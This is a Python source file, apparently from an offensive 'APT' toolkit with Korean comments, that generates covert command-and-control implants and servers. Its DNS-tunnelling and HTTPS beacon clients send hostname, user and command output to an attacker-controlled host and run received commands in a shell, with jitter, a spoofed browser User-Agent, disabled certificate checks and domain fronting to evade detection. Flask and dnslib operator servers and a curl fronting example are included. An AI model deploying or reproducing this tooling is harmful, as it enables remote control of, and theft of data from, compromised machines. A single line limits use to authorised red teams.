"""
APT Module 4 — Covert C2 Channel Generator  (v3.5.21)
======================================================
은폐 Command & Control 채널 구현 모듈.

기능:
  1. DNS 터널링 C2
     - 데이터를 base32 서브도메인으로 인코딩하여 DNS 쿼리로 전송
     - DNS TXT 응답으로 명령 수신
     - 서버 스크립트 자동 생성 (dnslib 기반)

  2. HTTPS Beacon C2
     - 랜덤 Jitter를 통한 주기적 비콘 통신
     - User-Agent 위장 (정상 브라우저처럼 보임)
     - AES-256-CBC 페이로드 암호화
     - HTTPS + SNI 위장 지원

  3. 탐지 회피 기법
     - 비콘 주기 Jitter (±30%)
     - 정상 도메인 DGA(Domain Generation Algorithm) 우회
     - CDN/클라우드 서비스 도메인 위장 (Domain Fronting)

주의: 허가된 레드팀/침투테스트 환경에서만 사용할 것.
"""

from __future__ import annotations

import base64
import hashlib
import os
import random
import socket
import struct
import textwrap
import time
from dataclasses import dataclass, field
from typing import Optional


# ── 공통 상수 ────────────────────────────────────────────────────────────

AES_KEY_LEN = 32     # AES-256
AES_BLOCK = 16
DEFAULT_BEACON_INTERVAL = 60   # 초
DEFAULT_JITTER_PCT = 30        # ±30%


@dataclass
class C2Config:
    c2_host: str
    c2_port: int = 443
    dns_domain: str = ""        # DNS 터널 도메인
    beacon_interval: int = DEFAULT_BEACON_INTERVAL
    jitter_pct: int = DEFAULT_JITTER_PCT
    user_agent: str = (
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/124.0.0.0 Safari/537.36"
    )
    aes_key: bytes = field(default_factory=lambda: os.urandom(AES_KEY_LEN))
    fronting_host: str = ""     # Domain Fronting SNI (예: d111111abcdef8.cloudfront.net)


class CovertC2:
    """
    은폐 C2 채널 생성기.
    실제 통신 객체가 아닌 페이로드 스크립트 생성기.
    생성된 스크립트를 타겟 환경에서 실행하여 C2 통신 수행.
    """

    def __init__(self, config: C2Config) -> None:
        self.config = config

    # ──────────────────────────────────────────────────────────────────────
    # 1. DNS 터널링
    # ──────────────────────────────────────────────────────────────────────

    def generate_dns_tunnel_client(self, output_path: str = "/tmp/dns_c2_client.py") -> str:
        """DNS 터널링 C2 클라이언트 스크립트 생성."""
        domain = self.config.dns_domain or f"c2.{self.config.c2_host}"
        key_hex = self.config.aes_key.hex()
        interval = self.config.beacon_interval
        jitter = self.config.jitter_pct

        code = textwrap.dedent(f"""\
            #!/usr/bin/env python3
            \"\"\"DNS Tunnel C2 Client — generated by bingo APT module\"\"\"
            import base64, os, random, socket, subprocess, time

            C2_DOMAIN = "{domain}"
            AES_KEY   = bytes.fromhex("{key_hex}")
            INTERVAL  = {interval}
            JITTER    = {jitter}

            def _encode_chunk(data: bytes) -> str:
                return base64.b32encode(data).decode().rstrip("=").lower()

            def _dns_query(label: str) -> str:
                \"\"\"Simple DNS TXT query using raw socket (no dnspython needed).\"\"\"
                try:
                    import dns.resolver
                    ans = dns.resolver.resolve(f"{{label}}.{{C2_DOMAIN}}", "TXT")
                    return "".join(str(r) for r in ans).strip('"')
                except Exception:
                    pass
                return ""

            def send_data(data: bytes, session_id: str) -> None:
                chunk_size = 40  # ~32 bytes per DNS label
                chunks = [data[i:i+chunk_size] for i in range(0, len(data), chunk_size)]
                for idx, chunk in enumerate(chunks):
                    label = f"{{_encode_chunk(chunk)}}.{{idx}}.{{session_id}}"
                    try:
                        socket.getaddrinfo(f"{{label}}.{{C2_DOMAIN}}", None)
                    except Exception:
                        pass

            def recv_command(session_id: str) -> str:
                cmd_label = f"cmd.{{session_id}}"
                return _dns_query(cmd_label)

            def beacon_loop():
                session_id = base64.b32encode(os.urandom(6)).decode().rstrip("=").lower()
                print(f"[*] DNS C2 beacon started | session={{session_id}} | domain={{C2_DOMAIN}}")
                while True:
                    try:
                        # 비콘 전송
                        hostname = subprocess.check_output("hostname", shell=True, text=True).strip()
                        whoami = subprocess.check_output("whoami", shell=True, text=True).strip()
                        checkin = f"CHECKIN|{{hostname}}|{{whoami}}".encode()
                        send_data(checkin, session_id)

                        # 명령 수신
                        cmd = recv_command(session_id)
                        if cmd and cmd.startswith("RUN:"):
                            result = subprocess.check_output(
                                cmd[4:], shell=True, text=True, timeout=30
                            )
                            send_data(result.encode(), session_id)

                    except Exception as e:
                        pass

                    # Jitter 적용 슬립
                    jitter_sec = INTERVAL * (JITTER / 100)
                    sleep_time = INTERVAL + random.uniform(-jitter_sec, jitter_sec)
                    time.sleep(max(1, sleep_time))

            if __name__ == "__main__":
                beacon_loop()
        """)

        with open(output_path, "w") as f:
            f.write(code)
        return output_path

    def generate_dns_tunnel_server(self, output_path: str = "/tmp/dns_c2_server.py") -> str:
        """DNS 터널링 C2 서버 스크립트 생성 (dnslib 기반)."""
        domain = self.config.dns_domain or f"c2.{self.config.c2_host}"

        code = textwrap.dedent(f"""\
            #!/usr/bin/env python3
            \"\"\"
            DNS Tunnel C2 Server — generated by bingo APT module
            Requirements: pip install dnslib
            Run as root: sudo python3 dns_c2_server.py
            \"\"\"
            import threading, base64, datetime
            from dnslib import DNSRecord, RR, QTYPE, TXT, A
            from dnslib.server import DNSServer, DNSHandler, BaseResolver

            C2_DOMAIN = "{domain}"
            LISTEN_IP = "0.0.0.0"
            LISTEN_PORT = 53

            sessions = {{}}   # session_id -> {{hostname, whoami, data}}
            pending_cmds = {{}}  # session_id -> command

            class TunnelResolver(BaseResolver):
                def resolve(self, request, handler):
                    qname = str(request.q.qname).rstrip(".")
                    reply = request.reply()

                    # 비콘 수신 처리
                    if qname.endswith(C2_DOMAIN):
                        label = qname[:-len(C2_DOMAIN)-1]
                        parts = label.split(".")

                        if parts[0] == "cmd" and len(parts) >= 2:
                            # 명령 요청
                            session_id = parts[1]
                            cmd = pending_cmds.pop(session_id, "NOP")
                            txt = f"RUN:{{cmd}}" if cmd != "NOP" else "NOP"
                            reply.add_answer(RR(request.q.qname, QTYPE.TXT,
                                               rdata=TXT(txt), ttl=1))
                        elif len(parts) >= 3:
                            # 데이터 수신
                            encoded, idx, session_id = parts[0], parts[1], parts[2]
                            try:
                                pad = encoded.upper() + "=" * ((-len(encoded)) % 8)
                                data = base64.b32decode(pad).decode(errors="replace")
                                if session_id not in sessions:
                                    sessions[session_id] = {{"data": [], "ts": str(datetime.datetime.now())}}
                                sessions[session_id]["data"].append(data)
                                ts = datetime.datetime.now().strftime("%H:%M:%S")
                                print(f"[{{ts}}] SID={{session_id}} idx={{idx}}: {{data[:80]}}")
                            except Exception:
                                pass
                            reply.add_answer(RR(request.q.qname, QTYPE.A,
                                               rdata=A("127.0.0.1"), ttl=1))
                    return reply

            def interactive_shell():
                print("DNS C2 Server running. Commands:")
                print("  sessions  — list active sessions")
                print("  send <sid> <cmd>  — send command to session")
                print("  quit  — stop server")
                while True:
                    try:
                        line = input("c2> ").strip()
                        if line == "sessions":
                            for sid, info in sessions.items():
                                print(f"  {{sid}}: {{info.get('data', [])[-1:]}}")
                        elif line.startswith("send "):
                            parts = line.split(" ", 2)
                            if len(parts) == 3:
                                pending_cmds[parts[1]] = parts[2]
                                print(f"[+] Command queued for {{parts[1]}}")
                        elif line == "quit":
                            break
                    except (EOFError, KeyboardInterrupt):
                        break

            if __name__ == "__main__":
                resolver = TunnelResolver()
                server = DNSServer(resolver, port=LISTEN_PORT, address=LISTEN_IP)
                server.start_thread()
                print(f"[*] DNS C2 Server listening on {{LISTEN_IP}}:{{LISTEN_PORT}}")
                print(f"[*] Domain: {{C2_DOMAIN}}")
                interactive_shell()
                server.stop()
        """)

        with open(output_path, "w") as f:
            f.write(code)
        return output_path

    # ──────────────────────────────────────────────────────────────────────
    # 2. HTTPS Beacon C2
    # ──────────────────────────────────────────────────────────────────────

    def generate_https_beacon_client(self, output_path: str = "/tmp/https_c2_client.py") -> str:
        """HTTPS Beacon C2 클라이언트 스크립트 생성."""
        c2 = self.config.c2_host
        port = self.config.c2_port
        key_hex = self.config.aes_key.hex()
        interval = self.config.beacon_interval
        jitter = self.config.jitter_pct
        ua = self.config.user_agent
        fronting = self.config.fronting_host

        code = textwrap.dedent(f"""\
            #!/usr/bin/env python3
            \"\"\"HTTPS Beacon C2 Client — generated by bingo APT module\"\"\"
            import base64, json, os, random, ssl, subprocess, time, urllib.request

            C2_HOST   = "{c2}"
            C2_PORT   = {port}
            AES_KEY   = bytes.fromhex("{key_hex}")
            INTERVAL  = {interval}
            JITTER    = {jitter}
            USER_AGENT = "{ua}"
            FRONTING_HOST = "{fronting}"   # Domain Fronting (비어있으면 직접 연결)

            # ── AES-256-CBC 암호화 (PyCryptodome 없으면 XOR 폴백) ──────────
            def _encrypt(data: bytes) -> bytes:
                try:
                    from Crypto.Cipher import AES
                    from Crypto.Util.Padding import pad
                    iv = os.urandom(16)
                    cipher = AES.new(AES_KEY[:32], AES.MODE_CBC, iv)
                    return iv + cipher.encrypt(pad(data, 16))
                except ImportError:
                    # XOR 폴백 (경량)
                    key = (AES_KEY * ((len(data) // 32) + 1))[:len(data)]
                    return bytes(a ^ b for a, b in zip(data, key))

            def _decrypt(data: bytes) -> bytes:
                try:
                    from Crypto.Cipher import AES
                    from Crypto.Util.Padding import unpad
                    iv, ct = data[:16], data[16:]
                    cipher = AES.new(AES_KEY[:32], AES.MODE_CBC, iv)
                    return unpad(cipher.decrypt(ct), 16)
                except Exception:
                    key = (AES_KEY * ((len(data) // 32) + 1))[:len(data)]
                    return bytes(a ^ b for a, b in zip(data, key))

            def _beacon_request(endpoint: str, payload: dict) -> dict:
                raw = json.dumps(payload).encode()
                enc = base64.b64encode(_encrypt(raw)).decode()
                body = json.dumps({{"d": enc}}).encode()

                ctx = ssl.create_default_context()
                ctx.check_hostname = False
                ctx.verify_mode = ssl.CERT_NONE

                url = f"https://{{C2_HOST}}:{{C2_PORT}}{{endpoint}}"
                req = urllib.request.Request(url, data=body, method="POST")
                req.add_header("User-Agent", USER_AGENT)
                req.add_header("Content-Type", "application/json")
                req.add_header("X-Request-ID", base64.b64encode(os.urandom(8)).decode())
                if FRONTING_HOST:
                    req.add_header("Host", FRONTING_HOST)

                try:
                    with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
                        data = json.loads(resp.read())
                        if "d" in data:
                            dec = _decrypt(base64.b64decode(data["d"]))
                            return json.loads(dec)
                except Exception:
                    pass
                return {{}}

            def beacon_loop():
                session_id = base64.b64encode(os.urandom(8)).decode().rstrip("=")
                print(f"[*] HTTPS C2 beacon started | session={{session_id}}")
                while True:
                    try:
                        hostname = subprocess.check_output("hostname", shell=True, text=True).strip()
                        whoami   = subprocess.check_output("whoami", shell=True, text=True).strip()

                        resp = _beacon_request("/api/v1/check", {{
                            "sid": session_id,
                            "host": hostname,
                            "user": whoami,
                            "os": os.name,
                        }})

                        if resp.get("cmd"):
                            result = subprocess.check_output(
                                resp["cmd"], shell=True, text=True, timeout=60
                            )
                            _beacon_request("/api/v1/result", {{
                                "sid": session_id,
                                "output": result[:4096],
                            }})

                    except Exception:
                        pass

                    jitter_sec = INTERVAL * (JITTER / 100)
                    sleep_time = INTERVAL + random.uniform(-jitter_sec, jitter_sec)
                    time.sleep(max(1, sleep_time))

            if __name__ == "__main__":
                beacon_loop()
        """)

        with open(output_path, "w") as f:
            f.write(code)
        return output_path

    def generate_https_c2_server(self, output_path: str = "/tmp/https_c2_server.py") -> str:
        """HTTPS C2 서버 스크립트 생성 (Flask 기반)."""
        key_hex = self.config.aes_key.hex()

        code = textwrap.dedent(f"""\
            #!/usr/bin/env python3
            \"\"\"
            HTTPS Beacon C2 Server — generated by bingo APT module
            Requirements: pip install flask pycryptodome
            Run: python3 https_c2_server.py
            \"\"\"
            import base64, json, os, ssl
            from datetime import datetime
            from flask import Flask, request, jsonify
            from Crypto.Cipher import AES
            from Crypto.Util.Padding import pad, unpad

            app = Flask(__name__)
            AES_KEY = bytes.fromhex("{key_hex}")

            sessions = {{}}   # sid -> {{host, user, os, last_seen}}
            pending  = {{}}   # sid -> command

            def encrypt(data: bytes) -> str:
                iv = os.urandom(16)
                c  = AES.new(AES_KEY[:32], AES.MODE_CBC, iv)
                return base64.b64encode(iv + c.encrypt(pad(data, 16))).decode()

            def decrypt(b64: str) -> bytes:
                raw = base64.b64decode(b64)
                iv, ct = raw[:16], raw[16:]
                c = AES.new(AES_KEY[:32], AES.MODE_CBC, iv)
                return unpad(c.decrypt(ct), 16)

            @app.route("/api/v1/check", methods=["POST"])
            def check_in():
                try:
                    body  = request.get_json(force=True)
                    plain = json.loads(decrypt(body["d"]))
                    sid   = plain.get("sid", "unknown")
                    sessions[sid] = {{
                        "host": plain.get("host"), "user": plain.get("user"),
                        "os": plain.get("os"), "last_seen": str(datetime.now())
                    }}
                    ts = datetime.now().strftime("%H:%M:%S")
                    print(f"[{{ts}}] CHECK-IN: sid={{sid}} host={{plain.get('host')}} user={{plain.get('user')}}")

                    resp_data = {{"cmd": pending.pop(sid, "")}}
                    return jsonify({{"d": encrypt(json.dumps(resp_data).encode())}})
                except Exception as e:
                    return jsonify({{}})

            @app.route("/api/v1/result", methods=["POST"])
            def result():
                try:
                    body  = request.get_json(force=True)
                    plain = json.loads(decrypt(body["d"]))
                    sid   = plain.get("sid")
                    ts = datetime.now().strftime("%H:%M:%S")
                    print(f"[{{ts}}] RESULT from {{sid}}:")
                    print(plain.get("output", ""))
                except Exception:
                    pass
                return jsonify({{"ok": 1}})

            def shell():
                import threading
                def run():
                    while True:
                        try:
                            line = input("c2> ").strip()
                            if line == "sessions":
                                for sid, info in sessions.items():
                                    print(f"  {{sid}}: {{info}}")
                            elif line.startswith("send "):
                                _, sid, cmd = line.split(" ", 2)
                                pending[sid] = cmd
                                print(f"[+] Queued for {{sid}}: {{cmd}}")
                        except (EOFError, KeyboardInterrupt):
                            os._exit(0)
                threading.Thread(target=run, daemon=True).start()

            if __name__ == "__main__":
                # 자체 서명 인증서 생성 (없으면)
                if not os.path.exists("c2.crt"):
                    os.system("openssl req -x509 -newkey rsa:2048 -keyout c2.key "
                              "-out c2.crt -days 365 -nodes -subj '/CN=localhost' 2>/dev/null")
                shell()
                print("[*] HTTPS C2 Server starting on :443")
                app.run(host="0.0.0.0", port=443, ssl_context=("c2.crt", "c2.key"), debug=False)
        """)

        with open(output_path, "w") as f:
            f.write(code)
        return output_path

    # ──────────────────────────────────────────────────────────────────────
    # 3. Domain Fronting 설정 생성
    # ──────────────────────────────────────────────────────────────────────

    def generate_domain_fronting_guide(self) -> str:
        """Domain Fronting 설정 가이드 생성."""
        return textwrap.dedent(f"""\
            # Domain Fronting 설정 가이드
            # =============================
            # 실제 C2: {self.config.c2_host}
            # SNI (외부에 보이는 도메인): {self.config.fronting_host or 'd111111abcdef8.cloudfront.net'}

            # 1. AWS CloudFront 방식
            #    - CloudFront 배포 생성, Origin = {self.config.c2_host}
            #    - 클라이언트는 CloudFront 도메인으로 연결
            #    - Host 헤더를 실제 C2 도메인으로 설정

            # 2. curl 테스트
            curl -k https://{self.config.fronting_host or 'CLOUDFRONT-DOMAIN'} \\
              -H "Host: {self.config.c2_host}" \\
              -A "{self.config.user_agent}"

            # 3. 클라이언트 코드에서 FRONTING_HOST 설정
            FRONTING_HOST = "{self.config.fronting_host or 'YOUR-CDN-DOMAIN'}"
            # HTTP Host 헤더 = 실제 C2
            # TLS SNI = CDN 도메인 (검열 우회)
        """)

    # ──────────────────────────────────────────────────────────────────────
    # 4. 요약 출력
    # ──────────────────────────────────────────────────────────────────────

    def generate_all(self, output_dir: str = "/tmp") -> dict[str, str]:
        """모든 C2 스크립트 생성."""
        os.makedirs(output_dir, exist_ok=True)
        return {
            "dns_client": self.generate_dns_tunnel_client(f"{output_dir}/dns_c2_client.py"),
            "dns_server": self.generate_dns_tunnel_server(f"{output_dir}/dns_c2_server.py"),
            "https_client": self.generate_https_beacon_client(f"{output_dir}/https_c2_client.py"),
            "https_server": self.generate_https_c2_server(f"{output_dir}/https_c2_server.py"),
        }

    def summary(self, generated: dict[str, str], lang: str = "en") -> str:
        lines = [
            "━" * 60,
            "🕵️  Covert C2 Channel Scripts Generated",
            f"   DNS Tunnel  Client : {generated.get('dns_client', 'N/A')}",
            f"   DNS Tunnel  Server : {generated.get('dns_server', 'N/A')}",
            f"   HTTPS Beacon Client: {generated.get('https_client', 'N/A')}",
            f"   HTTPS Beacon Server: {generated.get('https_server', 'N/A')}",
            f"   C2 Host   : {self.config.c2_host}:{self.config.c2_port}",
            f"   Interval  : {self.config.beacon_interval}s ±{self.config.jitter_pct}%",
            f"   Encryption: AES-256-CBC",
            "━" * 60,
        ]
        if lang == "ko":
            lines[1] = "🕵️  은폐 C2 채널 스크립트 생성 완료"
        elif lang == "zh":
            lines[1] = "🕵️  隐蔽C2信道脚本生成完成"
        return "\n".join(lines)


# ── 편의 함수 ────────────────────────────────────────────────────────────

def quick_c2(
    c2_host: str,
    dns_domain: str = "",
    output_dir: str = "/tmp",
    lang: str = "en",
) -> str:
    """원라이너 C2 스크립트 생성."""
    cfg = C2Config(c2_host=c2_host, dns_domain=dns_domain)
    c2 = CovertC2(cfg)
    generated = c2.generate_all(output_dir)
    return c2.summary(generated, lang=lang)
